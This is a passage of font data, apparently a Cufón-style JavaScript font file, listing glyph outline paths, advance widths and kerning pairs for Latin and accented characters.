v63,4,105,-11,105,-74r0,-156v1,-61,-42,-77,-105,-72r0,-81v63,6,106,-17,105,-75v-1,-57,-40,-84,-106,-84v-72,0,-108,38,-108,113r0,516r-103,0r0,-522v-1,-128,86,-198,214,-197v118,0,206,55,205,171v0,51,-21,89,-62,116","w":565},{"d":"548,-615r-347,0r0,217r296,0r0,97r-296,0r0,301r-108,0r0,-712r455,0r0,97","w":585,"k":{"\u0153":35,"\u0152":20,"\u00f8":35,"\u00e6":35,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"z":30,"x":30,"u":30,"r":30,"p":30,"o":35,"n":30,"m":30,"e":35,"c":35,"a":35,"S":10,"Q":20,"O":20,"J":130,"G":20,"C":20,"A":60,".":95}},{"d":"381,0r-112,92r0,-197r112,0r0,105xm190,0r-112,92r0,-197r112,0r0,105","w":460,"k":{"Y":100,"W":50,"V":80,"T":100}},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm408,-943r-111,162r-77,0r75,-162r113,0","w":544},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm411,-604r-92,0r0,-108r92,0r0,108xm195,-604r-92,0r0,-108r92,0r0,108","w":530},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm446,-943r-111,162r-77,0r75,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"556,-272r-231,230r0,-123r107,-107r-107,-106r0,-123xm303,-272r-231,230r0,-123r108,-107r-108,-106r0,-123","w":592},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm474,-943r-111,162r-77,0r75,-162r113,0","w":675},{"d":"291,-398r-112,0r0,-109r112,0r0,109xm240,119v58,0,98,-44,98,-100r102,0v2,111,-89,192,-200,192v-110,0,-201,-80,-199,-192v1,-87,83,-169,125,-231v17,-25,19,-47,18,-84r102,0v12,116,-69,169,-112,240v-62,67,-25,175,66,175","w":511},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm422,-604r-92,0r0,-108r92,0r0,108xm206,-604r-92,0r0,-108r92,0r0,108","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"644,-368v80,0,140,55,140,137r0,101v2,82,-60,137,-140,137v-80,0,-140,-55,-140,-137r0,-101v-2,-82,60,-137,140,-137xm629,-712r-335,712r-82,0r336,-712r81,0xm198,-719v80,0,140,55,140,137r0,101v2,82,-60,136,-140,136v-80,0,-140,-54,-140,-136r0,-101v-2,-82,60,-137,140,-137xm644,-61v78,0,62,-93,63,-167v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,48,21,72,63,72xm198,-413v78,0,62,-92,63,-166v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,47,21,71,63,71","w":842},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm429,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":530},{"d":"476,-132r-64,63r-146,-145r-145,145r-64,-63r146,-146r-146,-146r64,-64r145,146r146,-146r64,64r-146,146"},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154","w":675,"k":{"J":21}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm257,-826v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm257,-638v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":530},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm427,-604r-92,0r0,-108r92,0r0,108xm211,-604r-92,0r0,-108r92,0r0,108","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"273,-629v-53,0,-85,26,-88,77v-3,64,87,85,145,102v95,28,142,91,142,186v0,73,-48,131,-97,156v59,26,88,73,88,141v0,163,-211,230,-327,135v-37,-29,-56,-72,-58,-127r100,0v4,50,39,79,94,79v55,0,91,-31,91,-84v0,-69,-86,-91,-148,-109v-94,-27,-141,-91,-141,-186v0,-73,48,-131,97,-156v-56,-27,-84,-72,-84,-134v0,-100,79,-169,186,-169v109,0,185,63,188,165r-98,0v-4,-51,-34,-76,-90,-76xm273,-154v61,0,99,-48,99,-107v0,-64,-42,-107,-99,-108v-62,-1,-99,46,-99,108v0,62,37,107,99,107","w":543},{"d":"629,0r-99,0r-329,-501r0,501r-108,0r0,-712r99,0r329,500r0,-500r108,0r0,712xm293,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":721},{"d":"183,0r-102,0r0,-507r102,0r0,507xm389,-604r-92,0r0,-108r92,0r0,108xm173,-604r-92,0r0,-108r92,0r0,108","w":264},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-599r-77,0r-111,-162r113,0","w":264},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm453,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":568},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm445,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"567,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,78,-190,79v-80,0,-140,-26,-179,-79v-47,56,-88,78,-182,79v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49r-67,-63v46,-53,89,-72,182,-73v83,0,141,22,172,67v37,-45,87,-67,150,-67xm681,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72","w":837},{"d":"175,-716v92,0,162,87,119,172v-35,69,-107,129,-156,190r167,0r0,69r-260,0r0,-69r161,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-77,0v-1,-75,55,-124,130,-124","w":350},{"d":"735,-507r-158,507r-87,0r-119,-354r-118,354r-88,0r-157,-507r108,0r98,357r118,-357r79,0r117,357r98,-357r109,0","w":743,"k":{"\u0153":7,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"\u00e7":7,"\u00e6":7,"o":7,"e":7,"c":7,".":46}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm482,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":625,"k":{"\u0152":5,"y":8,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm310,-1000v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm310,-812v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"201,0r-108,0r0,-712r108,0r0,712xm437,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":294},{"d":"303,-272r-231,230r0,-123r108,-107r-108,-106r0,-123","w":339},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm464,-786r-92,0r0,-108r92,0r0,108xm248,-786r-92,0r0,-108r92,0r0,108","w":625,"k":{"\u0152":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm255,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"38,-513v0,-123,97,-199,225,-199r281,0r0,917r-102,0r0,-820r-108,0r0,820r-102,0r0,-522v-105,3,-194,-92,-194,-196","w":637},{"d":"559,-712r-236,712r-84,0r-234,-712r112,0r164,518r164,-518r114,0","w":564,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":35,"\u00c5":35,"\u00c4":35,"\u00c3":35,"\u00c2":35,"\u00c1":35,"\u00c0":35,"z":20,"y":10,"x":20,"u":20,"s":40,"r":20,"q":40,"p":20,"o":40,"n":20,"m":20,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":35,".":80}},{"d":"597,-81r-67,67r-74,-74v-71,51,-177,51,-248,0r-73,74r-67,-67r73,-74v-51,-71,-51,-177,0,-248r-73,-73r67,-67r73,73v69,-49,179,-49,248,0r74,-73r67,67r-74,73v51,71,51,177,0,248xm332,-143v73,0,136,-63,136,-136v0,-73,-63,-135,-136,-135v-73,0,-136,62,-136,135v0,73,63,136,136,136","w":665},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"652,-431v92,0,163,88,120,173v-35,69,-108,128,-157,189r167,0r0,69r-259,0r0,-69r160,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-76,0v-1,-75,54,-124,129,-124xm588,-712r-335,712r-81,0r335,-712r81,0xm204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":827},{"d":"220,74r-102,0r0,-860r102,0r0,860","w":338},{"d":"420,-453v46,47,59,106,60,199v3,164,-68,260,-212,260v-38,0,-73,-8,-104,-25r-37,63r-69,0r58,-99v-46,-47,-56,-106,-59,-199v-5,-159,70,-255,211,-259v39,0,74,8,105,25r37,-63r69,0xm268,-422v-86,0,-108,59,-109,168v0,49,5,86,15,109r154,-260v-17,-11,-37,-17,-60,-17xm268,-85v86,0,110,-60,110,-169v0,-49,-5,-86,-15,-109r-154,260v17,12,37,18,59,18","w":537},{"d":"431,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm431,-61v159,0,289,-135,289,-295v0,-160,-130,-295,-289,-295v-160,0,-290,135,-290,295v0,160,131,295,290,295xm578,-432v0,55,-35,91,-77,106r87,165r-81,0r-80,-155r-50,0r0,155r-72,0r0,-391r147,0v70,-2,126,53,126,120xm443,-373v35,1,64,-25,64,-59v0,-34,-29,-59,-64,-59r-66,0r0,118r66,0","w":862},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm333,-599r-77,0r-111,-162r113,0","w":568},{"d":"205,-398r-112,0r0,-109r112,0r0,109xm211,205r-124,0r22,-500r80,0","w":332},{"d":"281,-85v65,0,104,-43,104,-113r0,-309r102,0r0,507r-100,0r0,-51v-48,55,-146,79,-209,32r0,224r-102,0r0,-712r102,0r0,309v-1,70,38,113,103,113","w":569},{"d":"381,-300v45,-1,54,-16,85,-44r65,64v-50,47,-73,71,-148,78v-45,4,-142,-58,-191,-57v-45,1,-54,16,-85,44r-64,-64v50,-47,72,-71,147,-78v45,-4,142,59,191,57","w":574},{"d":"201,0r-108,0r0,-712r108,0r0,712xm401,-786r-92,0r0,-108r92,0r0,108xm185,-786r-92,0r0,-108r92,0r0,108","w":294},{"d":"383,-786r-285,860r-98,0r285,-860r98,0","w":380},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm200,-726v38,0,94,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"482,-230r-431,0r0,-95r431,0r0,95"},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm189,-726v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":530},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm510,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":675},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm390,-781r-77,0r-111,-162r113,0","w":675},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169","w":485,"k":{"\u0153":17,"\u00f6":17,"\u00f5":17,"\u00f4":17,"\u00f3":17,"\u00f2":17,"\u00eb":17,"\u00ea":17,"\u00e9":17,"\u00e8":17,"\u00e6":8,"\u00e5":8,"\u00e4":8,"\u00e3":8,"\u00e2":8,"\u00e1":8,"\u00e0":8,"w":20,"o":17,"e":17,"d":10,"c":17,"a":8}},{"d":"804,-61r-40,0r0,61r-73,0r0,-61r-174,0r0,-71r146,-295r84,0r-147,295r91,0r0,-83r73,0r0,83r40,0r0,71xm638,-712r-335,712r-81,0r335,-712r81,0xm181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":844},{"d":"922,0r-451,0r0,-58v-78,95,-254,77,-335,-10v-70,-75,-66,-134,-69,-288v-2,-133,5,-222,69,-288v83,-86,256,-105,335,-10r0,-58r450,0r0,96r-342,0r0,210r291,0r0,94r-291,0r0,216r343,0r0,96xm429,-135v63,-47,42,-275,34,-371v-9,-110,-173,-156,-245,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v50,60,161,58,211,0","w":977},{"d":"201,0r-108,0r0,-712r108,0r0,712xm281,-943r-111,162r-77,0r75,-162r113,0","w":294},{"d":"289,-474v136,2,187,95,190,236v4,155,-70,245,-210,245v-125,0,-198,-69,-206,-191r102,0v9,66,43,99,104,99v82,0,108,-55,108,-153v0,-99,-35,-149,-104,-149v-54,0,-88,21,-101,64r-93,0r0,-389r384,0r0,91r-292,0r0,188v26,-27,65,-41,118,-41"},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-761r-111,162r-77,0r75,-162r113,0","w":264},{"w":125},{"d":"55,-366v0,-139,69,-236,183,-255r0,-91r80,0r0,90v54,7,101,31,141,74r-68,66v-25,-27,-52,-43,-82,-48r0,328v30,-5,57,-21,82,-48r68,66v-40,43,-87,67,-141,74r0,110r-80,0r0,-111v-114,-19,-183,-116,-183,-255xm247,-528v-121,20,-121,307,0,324r0,-324","w":498},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0","w":544,"k":{"\u0153":80,"\u0152":10,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":40,"\u00c5":40,"\u00c4":40,"\u00c3":40,"\u00c2":40,"\u00c1":40,"\u00c0":40,"z":40,"x":40,"u":40,"s":80,"r":40,"q":80,"p":40,"o":80,"n":40,"m":40,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":10,"O":10,"J":40,"G":10,"C":10,"A":40,".":80}},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169","w":537,"k":{"y":10,"x":20,"w":7,"v":10}},{"d":"179,-521r-101,0r0,-191r101,0r0,191","w":257},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm477,-786r-92,0r0,-108r92,0r0,108xm261,-786r-92,0r0,-108r92,0r0,108","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"381,-607r-112,91r0,-196r112,0r0,105xm190,-607r-112,91r0,-196r112,0r0,105","w":459,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"w":500},{"d":"266,-718v116,0,208,81,208,197v0,67,-29,118,-86,153v65,39,98,95,98,167v0,124,-98,207,-220,207v-123,0,-219,-83,-219,-207v0,-72,33,-128,98,-167v-57,-35,-86,-86,-86,-153v0,-116,91,-197,207,-197xm266,-410v61,0,106,-47,106,-108v0,-61,-45,-109,-106,-109v-61,0,-105,48,-105,109v0,61,44,108,105,108xm266,-85v64,0,117,-53,117,-118v0,-65,-53,-119,-117,-119v-64,0,-117,54,-117,119v0,65,53,118,117,118"},{"d":"220,-436r-102,0r0,-350r102,0r0,350xm220,74r-102,0r0,-350r102,0r0,350","w":344},{"w":166},{"w":166},{"d":"181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":362},{"d":"260,-719v118,0,207,82,207,199v0,72,-30,123,-89,152v67,29,100,85,100,168v0,129,-93,207,-218,207v-125,0,-217,-73,-218,-200r102,0v2,68,49,107,116,108v69,0,117,-47,116,-118v-1,-80,-49,-123,-136,-117r0,-89v81,5,124,-34,125,-108v1,-66,-43,-110,-105,-110v-63,0,-103,42,-107,102r-102,0v2,-115,93,-194,209,-194"},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm435,-604r-92,0r0,-108r92,0r0,108xm219,-604r-92,0r0,-108r92,0r0,108","w":568},{"d":"314,-513v110,-2,177,76,176,186r0,327r-102,0r0,-311v2,-69,-39,-110,-102,-111v-63,0,-103,43,-103,111r0,311r-102,0r0,-712r102,0r0,256v35,-38,79,-57,131,-57","w":566},{"d":"897,0r-455,0r0,-162r-235,0r-84,162r-118,0r374,-712r518,0r0,97r-347,0r0,209r296,0r0,97r-296,0r0,212r347,0r0,97xm442,-254r0,-361r-188,361r188,0","w":952},{"d":"256,-497v88,0,163,75,163,163v0,88,-75,163,-163,163v-88,0,-163,-75,-163,-163v0,-88,75,-163,163,-163","w":512},{"w":250},{"d":"482,-316r-168,0r0,169r-95,0r0,-169r-168,0r0,-95r168,0r0,-168r95,0r0,168r168,0r0,95xm482,0r-431,0r0,-95r431,0r0,95"},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm495,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm241,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"822,-285r-77,0r0,-279r-90,179r-71,0r-90,-179r0,279r-77,0r0,-427r77,0r125,243r126,-243r77,0r0,427xm346,-643r-115,0r0,358r-76,0r0,-358r-114,0r0,-69r305,0r0,69","w":883},{"d":"190,-607r-112,91r0,-196r112,0r0,105","w":268,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"431,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm431,-62v159,0,289,-134,289,-294v0,-160,-130,-294,-289,-294v-159,0,-289,134,-289,294v0,160,130,294,289,294xm329,-356v0,78,32,136,108,136v30,0,58,-12,85,-35r46,47v-39,35,-82,52,-131,52v-111,1,-179,-85,-179,-200v0,-115,68,-201,179,-200v47,0,91,17,131,52r-46,47v-27,-23,-55,-35,-85,-35v-76,0,-108,58,-108,136","w":862},{"d":"498,-107r-76,0r0,107r-99,0r0,-107r-288,0r0,-95r251,-510r110,0r-250,510r177,0r0,-166r99,0r0,166r76,0r0,95"},{"w":200},{"d":"421,0r-378,0r0,-81r252,-335r-238,0r0,-91r364,0r0,81r-254,335r254,0r0,91","w":469},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm440,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"w":200},{"d":"54,-509v0,-121,87,-198,204,-207r0,-90r82,0r0,89v76,5,140,31,191,80r-69,68v-34,-32,-78,-50,-131,-54r0,216v135,13,225,66,225,204v0,124,-96,197,-216,206r0,111r-82,0r0,-108v-94,-4,-170,-35,-228,-94r72,-71v42,42,97,65,165,68r0,-222v-123,-8,-213,-70,-213,-196xm267,-622v-90,-3,-144,114,-81,175v19,18,46,28,81,33r0,-208xm331,-93v68,-5,117,-40,118,-107v1,-73,-50,-100,-118,-105r0,212","w":608},{"d":"482,-225r-168,0r0,168r-95,0r0,-168r-168,0r0,-95r168,0r0,-167r95,0r0,167r168,0r0,95"},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0","w":625,"k":{"\u201d":80,"\u201c":80,"\u2019":80,"\u2018":80,"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"266,-718v125,0,213,86,211,213v0,46,-18,104,-53,175r-162,330r-109,0r153,-306v-135,46,-250,-59,-250,-195v0,-127,86,-217,210,-217xm266,-380v68,0,109,-52,109,-123v0,-70,-42,-124,-109,-124v-67,0,-108,53,-108,124v0,69,40,123,108,123"},{"d":"544,0r-451,0r0,-712r108,0r0,615r343,0r0,97","w":574,"k":{"\u201d":150,"\u201c":150,"\u2019":150,"\u2018":150,"\u0152":30,"\u00d6":30,"\u00d5":30,"\u00d4":30,"\u00d3":30,"\u00d2":30,"\u00c7":21,"y":60,"Y":80,"W":40,"V":70,"U":21,"T":80,"Q":30,"O":30,"J":-8,"G":30,"C":30}},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm447,-943r-111,162r-77,0r75,-162r113,0","w":603},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0","w":646,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"245,-712r-22,500r-80,0r-22,-500r124,0xm239,0r-112,0r0,-109r112,0r0,109","w":332},{"w":333},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm375,-781r-77,0r-111,-162r113,0","w":647,"k":{"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm309,-599r-77,0r-111,-162r113,0","w":530},{"d":"57,-263v0,-150,40,-250,179,-250v55,0,100,20,133,60r0,-54r99,0r0,504v1,127,-87,217,-217,214v-88,-1,-129,-22,-179,-67r65,-65v32,30,69,45,110,45v104,2,127,-84,119,-194v-33,39,-76,58,-131,58v-136,0,-178,-102,-178,-251xm263,-104v88,0,103,-71,103,-159v0,-88,-15,-158,-103,-159v-88,0,-104,71,-104,159v0,88,16,159,104,159","w":549},{"d":"530,-615r-196,0r0,615r-108,0r0,-615r-196,0r0,-97r500,0r0,97",